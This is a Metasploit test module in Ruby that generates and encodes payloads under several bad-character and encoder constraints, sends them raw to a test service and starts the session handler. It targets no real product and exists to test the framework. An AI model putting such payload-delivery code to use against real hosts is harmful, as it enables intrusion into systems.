##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

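# Internal test module: exercises payload generation, encoding and the
# handler against a throwaway test service. It is not an exploit for any
# real product; the targets differ only in the payload constraints they
# impose so that encoder selection and failure paths can be checked.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, targets and the two test options.
  #
  # @param info [Hash] metadata merged by Msf::Exploit#update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Internal Aggressive Test Exploit',
      'Description'    =>
        "This module tests the exploitation of a test service.",
      'Author'         => 'skape',
      'License'        => MSF_LICENSE,
      'Arch'           => 'x86',
      'Payload'        =>
        {
          'Space'    => 1000,
          'MaxNops'  => 0,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          # Target 0: Universal -- no extra constraints beyond the defaults above.
          [
            'Any Platform',
            {
              'Platform' => [ 'linux', 'win' ]
            }
          ],
          # Target 1: forces a specific encoder type and encoder options.
          [
            'Test encoder specific',
            {
              'Platform' => [ 'linux', 'win' ],
              'Payload'  =>
                {
                  'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
                  'EncoderOptions' =>
                    {
                      'BufferRegister' => 'EBX',
                      'BufferOffset'   => 4
                    }
                }
            },
          ],
          # Target 2: every byte value is bad, so no encoder can succeed.
          [
            'Cannot be encoded',
            {
              'Platform' => [ 'linux', 'win' ],
              'Payload'  =>
                {
                  # Array#join is required here. On Ruby >= 1.9 Array#to_s
                  # returns the inspect form ("[\"\\x00\", \"\\x01\", ...]")
                  # rather than the concatenated bytes, which silently left
                  # most byte values allowed and defeated this target's purpose.
                  'BadChars' => (0..255).map(&:chr).join
                }
            }
          ],
          # Target 3: same bad chars as the default; selected by name in #exploit
          # to dump the start of the encoded payload for context-encoder tests.
          [ 'Test context encoder',
            {
              'Platform' => [ 'linux', 'win' ],
              'Payload'  =>
                {
                  'BadChars' => "\x00"
                }
            }
          ]
        ],
      'DefaultTarget' => 0))

    register_options(
      [
        OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
        OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
      ])
  end

  # Excluded from automatic module selection: this is a test harness only.
  #
  # @return [false]
  def autofilter
    false
  end

  # Always reports the test service as vulnerable; there is no real probe.
  #
  # @return [Exploit::CheckCode] Exploit::CheckCode::Vulnerable
  def check
    Exploit::CheckCode::Vulnerable
  end

  # Connects to the test service, sends the encoded payload and starts the
  # handler. Optionally dumps the first 40 bytes of the encoded payload
  # (context encoder target) and optionally blocks on stdin before
  # handing off to the handler.
  def exploit
    # Generate the payload once and reuse the same bytes for the dump,
    # the status line and the send.
    encoded = payload.encoded

    # Show disassembled payload for context encoder test
    if target.name =~ /context encoder/
      puts Rex::Assembly::Nasm.disassemble(encoded[0, 40])
    end

    connect

    print_status("Sending #{encoded.length} byte payload...[#{datastore['TestInteger']}]")

    sock.put(encoded)

    # Interactive pause used when stepping through the test by hand.
    if datastore['WaitForInput']
      puts "Type something..."
      gets
    end

    handler
  end

end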
